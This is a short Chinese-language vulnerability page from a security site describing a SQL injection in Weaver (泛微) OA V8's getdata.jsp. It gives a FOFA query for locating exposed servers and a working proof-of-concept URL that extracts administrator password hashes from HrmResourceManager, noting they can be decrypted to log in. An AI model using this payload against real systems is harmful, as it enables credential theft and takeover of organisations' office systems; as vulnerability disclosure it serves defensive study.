黑客街 黑客街

泛微OA V8 getdata.jsp SQL注入漏洞

目录

漏洞描述 #

泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限

漏洞影响 #

泛微OA V8

FOFA #

app="泛微-协同办公OA"

漏洞复现 #

在getdata.jsp中,直接将request对象交给

weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) :

 

POC #

http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager

泛微OA V8 getdata.jsp SQL注入漏洞

解密后即可登录系统

泛微OA V8 getdata.jsp SQL注入漏洞
What are your Feelings
黑客街导航站是一款努力把互联网安全站点集接到一起,希望为每个小伙伴提供良好的"安全"体验。

街头小贩 匿名追踪 杀软对比

黑客街公众号黑客街

黑客街公众号

我要合作黑客街

我要合作

关于我们 免责说明 商务合作

Copyright © 2022 黑客街   豫ICP备19005024号    站点地图